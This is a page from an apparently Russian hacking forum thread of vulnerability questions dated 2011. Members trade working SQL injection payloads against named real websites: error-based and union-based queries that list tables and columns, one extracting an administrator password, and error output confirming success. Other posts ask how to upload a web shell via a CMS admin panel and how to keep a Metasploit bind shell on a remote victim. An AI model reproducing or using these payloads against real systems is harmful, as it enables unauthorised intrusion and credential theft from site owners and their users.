Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    s000r
    http://powerdefence.ru/Uslugi_dlya_Yur_lic'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'1/

    Не слушай никого, крути

    Срань какая, прости господи )

    Osstudio я бы на твоём месте вообще перестал писать )
     
    #18321 KolosJey, 15 Nov 2011
    Last edited: 15 Nov 2011
    3 people like this.
  2. Kerny

    Kerny Member

    Joined:
    18 Nov 2009
    Messages:
    37
    Likes Received:
    9
    Reputations:
    1
    Не уверен, но вроде инъекция в POST, запросе. Подставьте кавычку, увидите. Но реализовать не получается. Есть ли там вообще уязв?
     
  3. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    Kerny,
    Уязвимость есть! Через Live HTTP Headers...
    Т.е. в поле Пароль:
    Code:
    'or+1=1)+union+select+1,2+--+
    Error based, в поле логин:
    Code:
    'or+1=1)+and+(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+--+
    Получаем:
    Code:
      Duplicate entry 'CHARACTER_SETS1' for key 'group_key'

    P.S. Не обращай внимания на цифру "1" в конце.
    P.S.S. Походу mq = on ...
     
    #18323 tabletkO, 15 Nov 2011
    Last edited: 15 Nov 2011
    1 person likes this.
  4. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    http://rusbanket.ru/index.php?ukey=news&blog_id=0%20union%20select%20version%28%29;+--

    как такое крутить? :( как error based - вывел версию, а вывести значение столбца из определенной таблицы не получалось
     
  5. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    vadd,
    Code:
    http://rusbanket.ru/index.php?ukey=news&blog_id=8+and(select+1+from(select+count(*),concat((select+[B]table_name[/B]+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
    Code:
    http://rusbanket.ru/index.php?ukey=news&blog_id=8+and(select+1+from(select+count(*),concat((select+column_name+from+information_schema.columns+where+table_name='[B]SC_orders[/B]'+limit+0,1),floor(rand(0)*2))x+from+information_schema.columns+group+by+x)a)--
     
    #18325 tabletkO, 15 Nov 2011
    Last edited: 15 Nov 2011
    2 people like this.
  6. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Ошибка - не есть инъекция.
    Логика не отрабатывает.
    p.s. Osstudio знает, что говорит.
     
  7. KeepInTouch

    KeepInTouch New Member

    Joined:
    14 Oct 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Уязвимость есть. Пробуйте в другом браузере, не Firefox, т.к. он кавычку преображает в %27, поэтому уязвимость на данном сайте в Firefox не видна.
    Результат вышеуказанного запроса:
    Duplicate column name '5.0.51a-3ubuntu5.8-log'
     
  8. lion-art

    lion-art Banned

    Joined:
    30 Oct 2011
    Messages:
    37
    Likes Received:
    8
    Reputations:
    1
    Парадокс!

    Всем доброго времени суток. Ситуация такова:

    Сайт со скулей 5я ветка
    index/page/id/1'+or+1+group%20by%20concat((select%20concat(0x3a,password,0x3a)%20from%20cms_administrator%20limit%201,1),floor(rand(0)*2))%20having%20min(0)%20or%201='
    Этот запрос дал мне пароль админа из таблицы cms_administrator. Все здорово, отлично. Соответственно пас меняем на логин выдает логин. Все тоже работает на ура. Но есть еще один column - cms_user При таком же запросе к нему меня отбрасывает на 404 ошибку, как будто закончился лимит значений. Хотя значений там хватает. Ни логины не пароли ничего из этого столбца не дает.
    + Парадокс соседом является еще один сайт с немного другим функционалом но суть та-же организация та-же. Из за расстройства использовал Havij дал ему кавычку он схавал, выдал таблицы, столбцы и версия скуля тоже 5я и есть такие же столбцы пытался стянуть через него с админами все равно с цмс юзерами куча пустых строк. Кто еще не устал ответьте в чем может быть подвох? так на вскидку. :confused: :confused: :confused: :confused:
     
  9. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    lion-art,
    это значит, что ячейки пустые... Т.е. там нет юзеров..
     
  10. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Тебя кто суда звал? Вот например из этой же серии:
     
  11. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    ничего там не фильтруется
    http://www.povituha.ru/news.php?id=62+order+by+6--
    http://www.povituha.ru/news.php?id=62+order+by+7--
     
  12. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    :(

    Я тебе один раз объясню и больше не буду. Хочешь чему то научиться - учись. Не хочешь - продолжай писать и упираться рогами.

    Вот это неверный синтаксис. И ничего кроме
    ты не получишь. Нельзя ставить by в скобки. Не говорю про кавычку в скобках, и как там должно быть реализовано в коде, фиг с ней ...

    А вот это
    синтаксис нормальный, и разумеется он работает.

    Всё это отлично докумментировано и расписано по 100 раз, но если читать лень можно поставить денвер и тупо пробывать, прежде чем советы давать
     
    #18332 KolosJey, 17 Nov 2011
    Last edited: 17 Nov 2011
  13. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    дык знаю, просто и так и так работает всмысле. =/
     
  14. jawbreaker

    jawbreaker Elder - Старейшина

    Joined:
    7 Jul 2008
    Messages:
    156
    Likes Received:
    76
    Reputations:
    3
    Как найти таблицу пользователей в БД?
    Пробую так: http://seifi.ru/index.php?categoryID=781+UNION+SELECT+1+FROM+INFORMATION_SCHEMA.TABLES
    В ответ получаю
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1 FROM INFORMATION_SCHEMA.TABLES ) order by sort_order, name' at line 1 SQL query : select categoryID, name, brief_description, title_description, customers_rating, Price, in_stock, customer_votes, list_price, productID, default_picture, sort_order, items_sold, enabled, product_code, description, shipping_freight from SS_products where ( enabled=1 AND productID=1 ) OR ( enabled=1 AND categoryID=781 UNION SELECT 1 FROM INFORMATION_SCHEMA.TABLES ) order by sort_order, name
     
  15. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    надо закрыть скобку условия и отрубить остальную часть запроса каментом, но там либо скобка режеться, либо каменты, попробуй так
    Code:
    http://seifi.ru/index.php?categoryID=781+and+(select+1+from(select+count(*),concat((version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+--+
     
    #18335 nemaniak, 18 Nov 2011
    Last edited: 18 Nov 2011
  16. AppS

    AppS Member

    Joined:
    8 Aug 2009
    Messages:
    249
    Likes Received:
    25
    Reputations:
    6
    Не знаю сюда или нет, в общем суть такая, на сайте админка
    Memento CMS 2, как залить шел возможно? могу заливать картинки;(
     
  17. 0o Chris o0

    0o Chris o0 New Member

    Joined:
    16 Oct 2011
    Messages:
    142
    Likes Received:
    1
    Reputations:
    0
    Есть вопрос по metasploit'у. Если я использую начинку windows/shell_bind_tcp, а цель находится не в локальной сети и у нее динамический ip, как коннектиться к ней, каждый раз, когда у нее сменится ip?
     
  18. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    У тебя есть доступ в админку? если нет, то шелла не будет. Если есть...ищи гле можно редактировать Баннеры, шаблоны и т.д.
     
  19. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    Ты table_name забыл :D

    Code:
    http://seifi.ru/index.php?categoryID=781+UNION+SELECT+table_name+FROM+INFORMATION_SCHEMA.TABLES
    P.S. nemaniak, зачем все усложнять? ;)
     
  20. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173

    что тут можно сделать?
     
Thread Status:
Not open for further replies.